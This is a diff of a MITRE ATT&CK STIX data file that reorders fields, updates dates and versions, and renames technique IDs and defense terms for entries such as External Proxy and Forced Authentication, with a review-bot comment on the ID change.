- "modified": "2020-03-28T22:35:27.602Z",
+ "modified": "2020-04-22T15:19:31.380Z",
"created": "2020-02-20T14:34:08.496Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+ "x_mitre_data_sources": [
+ "Web logs",
+ "Web application firewall logs",
+ "Packet capture"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -10414,20 +10833,25 @@
"AWS",
"GCP",
"Azure"
- ],
- "x_mitre_data_sources": [
- "Web logs",
- "Web application firewall logs",
- "Packet capture"
- ],
- "x_mitre_detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
- "x_mitre_impact_type": [
- "Integrity"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
+ "created": "2020-03-14T23:12:18.466Z",
+ "modified": "2020-03-27T17:50:37.411Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.",
+ "name": "External Proxy",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -10445,22 +10869,6 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "External Proxy",
- "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.",
- "id": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-27T17:50:37.411Z",
- "created": "2020-03-14T23:12:18.466Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -10513,24 +10921,25 @@
"phase_name": "initial-access"
}
],
- "modified": "2020-03-23T19:37:54.071Z",
+ "modified": "2020-06-19T20:07:09.600Z",
"created": "2017-05-31T21:31:44.421Z",
- "x_mitre_version": "2.1",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.",
+ "x_mitre_data_sources": [
+ "Authentication logs"
+ ],
"x_mitre_contributors": [
"Daniel Oakley",
"Travis Smith, Tripwire"
],
- "x_mitre_data_sources": [
- "Authentication logs"
- ],
- "x_mitre_detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.1"
},
{
"id": "attack-pattern--52f3d5a6-8a0f-4f82-977e-750abf90d0b0",
@@ -10643,28 +11052,27 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T20:38:26.296Z",
+ "modified": "2020-06-20T22:26:33.191Z",
"created": "2020-01-14T17:18:32.126Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
+ "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Endgame Process Injection July 2017)",
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Endgame Process Injection July 2017)",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
- "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Fallback Channels",
- "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -10677,9 +11085,10 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
+ "name": "Fallback Channels",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -10687,8 +11096,9 @@
"phase_name": "command-and-control"
}
],
- "modified": "2019-07-17T21:17:03.445Z",
+ "modified": "2020-07-14T19:49:47.340Z",
"created": "2017-05-31T21:30:21.689Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Malware reverse engineering",
@@ -10744,17 +11154,17 @@
],
"modified": "2020-03-27T16:10:37.183Z",
"created": "2020-03-11T14:11:16.560Z",
+ "x_mitre_detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_data_sources": [
+ "DNS records"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_data_sources": [
- "DNS records"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection."
+ ]
},
{
"id": "attack-pattern--56fca983-1cf1-4fd1-bda0-5e170a37ab59",
@@ -10780,8 +11190,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.004",
- "url": "https://attack.mitre.org/techniques/T1551/004"
+ "external_id": "T1070.004",
+ "url": "https://attack.mitre.org/techniques/T1070/004"
},
{
"url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
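Review bot: The `external_id` of this technique object changes from `T1551.004` to `T1070.004` (with the matching `url`), while the object's `id` (`attack-pattern--…`) stays the same, so anything in this repository that keys on the technique number rather than the STIX id would silently stop matching this object. That cannot be verified from this diff alone; it is worth checking that any test definitions, indexes or mapping files that reference `T1551.004` are updated in the same change, or that lookups go through the stable `attack-pattern--` id. The `x_mitre_defense_bypassed` value change from `"Process whitelisting"` to `"Application control"` in `@@ -10643` is the same kind of upstream vocabulary rename and deserves the same check for consumers that filter on that string.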
@@ -10805,27 +11215,27 @@
],
"modified": "2020-03-29T21:34:16.209Z",
"created": "2020-01-31T12:35:36.479Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_contributors": [
+ "Walker Johnson"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Host forensic analysis"
+ ],
+ "x_mitre_detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.",
"x_mitre_data_sources": [
"Binary file metadata",
"Process command-line parameters",
"File monitoring"
],
- "x_mitre_detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.",
- "x_mitre_defense_bypassed": [
- "Host forensic analysis"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Walker Johnson"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -10887,11 +11297,9 @@
],
"modified": "2020-03-26T20:26:46.465Z",
"created": "2020-03-15T16:16:25.763Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Network protocol analysis",
"Process monitoring",
@@ -10899,14 +11307,26 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:31:04.710Z",
+ "modified": "2020-03-26T17:18:36.857Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "File and Directory Discovery",
+ "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).",
"external_references": [
{
"source_name": "mitre-attack",
@@ -10919,19 +11339,9 @@
"source_name": "Windows Commands JPCERT"
}
],
- "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).",
- "name": "File and Directory Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T17:18:36.857Z",
- "created": "2017-05-31T21:31:04.710Z",
"x_mitre_system_requirements": [
"Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls"
],
@@ -10955,9 +11365,19 @@
"x_mitre_is_subtechnique": false
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-03-29T23:12:40.212Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "File and Directory Permissions Modification",
+ "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory\u2019s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
"external_references": [
{
"source_name": "mitre-attack",
@@ -10980,19 +11400,9 @@
"source_name": "EventTracker File Permissions Feb 2014"
}
],
- "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory\u2019s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
- "name": "File and Directory Permissions Modification",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-29T23:12:40.212Z",
- "created": "2018-10-17T00:14:20.652Z",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
@@ -11022,6 +11432,13 @@
"x_mitre_version": "2.1"
},
{
+ "id": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89",
+ "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.",
+ "name": "Firmware Corruption",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "T1495",
@@ -11039,13 +11456,6 @@
"source_name": "MITRE Trustworthy Firmware Measurement"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Firmware Corruption",
- "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.",
- "id": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -11053,8 +11463,9 @@
"phase_name": "impact"
}
],
- "modified": "2019-07-17T21:23:45.464Z",
+ "modified": "2020-07-14T19:31:46.550Z",
"created": "2019-04-12T18:28:15.451Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -11113,7 +11524,7 @@
},
{
"url": "https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/",
- "description": "Malith, O. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.",
+ "description": "Osanda Malith Jayathissa. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.",
"source_name": "Osanda Stealing NetNTLM Hashes"
},
{
@@ -11132,27 +11543,27 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-25T20:32:05.842Z",
+ "modified": "2020-06-19T17:16:41.470Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.2",
- "x_mitre_contributors": [
- "Teodor Cimpoesu",
- "Sudhanshu Chauhan, @Sudhanshu_C"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)",
"x_mitre_data_sources": [
"File monitoring",
"Network protocol analysis",
"Network device logs",
"Process use of network"
],
- "x_mitre_detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Teodor Cimpoesu",
+ "Sudhanshu Chauhan, @Sudhanshu_C"
],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -11207,15 +11618,8 @@
],
"modified": "2020-03-24T20:56:14.853Z",
"created": "2020-02-11T18:58:45.908Z",
- "x_mitre_platforms": [
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.\n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Matthew Molyett, @s1air, Cisco Talos"
],
"x_mitre_data_sources": [
"PowerShell logs",
@@ -11223,8 +11627,15 @@
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_contributors": [
- "Matthew Molyett, @s1air, Cisco Talos"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.\n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows"
]
},
{
@@ -11304,26 +11715,26 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-02-05T16:16:08.471Z",
+ "modified": "2020-06-20T22:41:20.063Z",
"created": "2020-02-05T16:16:08.471Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Anti-virus"
+ "x_mitre_platforms": [
+ "macOS"
],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_detection": "Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_detection": "Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -11379,18 +11790,18 @@
],
"modified": "2020-03-31T12:59:10.840Z",
"created": "2020-02-11T19:13:33.643Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"Authentication logs",
"Windows event logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -11422,27 +11833,27 @@
],
"modified": "2020-03-30T13:38:08.738Z",
"created": "2017-05-31T21:30:50.342Z",
- "x_mitre_remote_support": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. \n\nUnknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of Legitimate Credentials to access remote systems within the network.",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.0",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters",
"Binary file metadata"
],
- "x_mitre_version": "2.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_detection": "Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. \n\nUnknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of Legitimate Credentials to access remote systems within the network.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_remote_support": true
},
{
"external_references": [
@@ -11507,27 +11918,27 @@
],
"modified": "2020-03-26T21:17:41.231Z",
"created": "2019-03-07T14:10:32.650Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_defense_bypassed": [
+ "System access controls",
+ "File system access controls"
+ ],
+ "x_mitre_detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). ",
+ "x_mitre_version": "1.1",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_data_sources": [
+ "Windows event logs"
],
"x_mitre_contributors": [
"Itamar Mizrahi, Cymptom",
"Tristan Bennett, Seamless Intelligence"
],
- "x_mitre_data_sources": [
- "Windows event logs"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.1",
